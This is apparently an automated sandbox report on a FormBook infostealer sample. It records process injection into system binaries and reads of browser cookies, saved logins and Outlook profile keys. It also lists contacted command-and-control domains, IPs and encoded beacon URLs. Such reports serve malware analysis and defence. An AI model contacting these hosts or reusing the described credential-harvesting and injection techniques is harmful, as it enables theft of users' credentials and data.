            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\H1CYDJ8LQe.exe"Jump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeProcess created: C:\Windows\SysWOW64\dvdplay.exe "C:\Windows\SysWOW64\dvdplay.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: H1CYDJ8LQe.exe, SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: SwTeWVAxKdsP.exe, 00000002.00000002.3526987619.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000002.00000000.1765206062.0000000001920000.00000002.00000001.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000000.1942393808.0000000000DD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: H1CYDJ8LQe.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\dvdplay.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: H1CYDJ8LQe.exeBinary or memory string: WIN_XP
            Source: H1CYDJ8LQe.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: H1CYDJ8LQe.exeBinary or memory string: WIN_XPe
            Source: H1CYDJ8LQe.exeBinary or memory string: WIN_VISTA
            Source: H1CYDJ8LQe.exeBinary or memory string: WIN_7
            Source: H1CYDJ8LQe.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549376 Sample: H1CYDJ8LQe.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 28 www.030002832.xyz 2->28 30 www.sortcy.top 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 H1CYDJ8LQe.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 SwTeWVAxKdsP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 dvdplay.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 SwTeWVAxKdsP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sortcy.top 184.94.215.26, 50032, 50033, 50034 VXCHNGE-NC01US United States 22->34 36 www.onlineblikje.online 213.249.67.10, 49772, 49783, 49798 METAREGISTRARNL Netherlands 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            H1CYDJ8LQe.exe39%ReversingLabsWin32.Trojan.ShellcodeCrypter
            H1CYDJ8LQe.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.bearableguy.net/m3fv/0%Avira URL Cloudsafe
            http://www.bearableguy.net0%Avira URL Cloudsafe
            http://www.onlineblikje.online/qmow/0%Avira URL Cloudsafe
            http://www.meliorahomes.net/y4rz/0%Avira URL Cloudsafe
            http://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            http://www.sortcy.top/sm4f/0%Avira URL Cloudsafe
            http://www.it2sp8.vip/r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56s0%Avira URL Cloudsafe
            http://www.ninesquare.games/4oy8/0%Avira URL Cloudsafe
            http://www.030002832.xyz/l9k5/0%Avira URL Cloudsafe
            http://www.bandukchi.com/5lco/0%Avira URL Cloudsafe
            http://www.s9gzg9.vip/bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw=0%Avira URL Cloudsafe
            http://www.bandukchi.com/5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB0%Avira URL Cloudsafe
            http://www.ninesquare.games/4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            http://www.meliorahomes.net/y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            http://www.onlineblikje.online/qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            http://www.030002832.xyz/l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc0%Avira URL Cloudsafe
            http://www.s9gzg9.vip/bawd/0%Avira URL Cloudsafe
            http://www.bdipjg.asia/mszq/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            it2sp8.vip
            		3.33.130.190
            		truetrue
              		unknown
              www.bdipjg.asia
              		78.141.202.204
              		truetrue
                		unknown
                s9gzg9.vip
                		3.33.130.190
                		truetrue
                  		unknown
                  www.030002832.xyz
                  		161.97.142.144
                  		truetrue
                    		unknown
                    www.onlineblikje.online
                    		213.249.67.10
                    		truetrue
                      		unknown
                      bandukchi.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.meliorahomes.net
                        		8.217.17.192
                        		truetrue
                          		unknown
                          www.sortcy.top
                          		184.94.215.26
                          		truetrue
                            		unknown
                            ninesquare.games
                            		3.33.130.190
                            		truetrue
                              		unknown
                              bearableguy.net
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.s9gzg9.vip
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.bearableguy.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bandukchi.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.ninesquare.games
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.it2sp8.vip
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.meliorahomes.net/y4rz/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.onlineblikje.online/qmow/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sortcy.top/sm4f/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ninesquare.games/4oy8/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bearableguy.net/m3fv/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.030002832.xyz/l9k5/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.it2sp8.vip/r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.meliorahomes.net/y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ninesquare.games/4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.s9gzg9.vip/bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw=true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bandukchi.com/5lco/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.onlineblikje.online/qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bandukchi.com/5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.030002832.xyz/l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshctrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.s9gzg9.vip/bawd/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bdipjg.asia/mszq/true
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabdvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sdvdplay.exe, 00000003.00000002.3527827023.0000000004298000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.0000000002EC8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.ecosia.org/newtab/dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.bearableguy.netSwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GBdvdplay.exe, 00000003.00000002.3527827023.0000000004A72000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.00000000036A2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          8.217.17.192
                                                          		www.meliorahomes.netSingapore
                                                          		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                          213.249.67.10
                                                          		www.onlineblikje.onlineNetherlands
                                                          		42585METAREGISTRARNLtrue
                                                          161.97.142.144
                                                          		www.030002832.xyzUnited States
                                                          		51167CONTABODEtrue
                                                          184.94.215.26
                                                          		www.sortcy.topUnited States
                                                          		394896VXCHNGE-NC01UStrue
                                                          3.33.130.190
                                                          		it2sp8.vipUnited States
                                                          		8987AMAZONEXPANSIONGBtrue
                                                          78.141.202.204
                                                          		www.bdipjg.asiaFrance
                                                          		20473AS-CHOOPAUStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1549376
                                                          Start date and time:2024-11-05 15:40:56 +01:00
                                                          Joe Sandbox product:CloudBasic
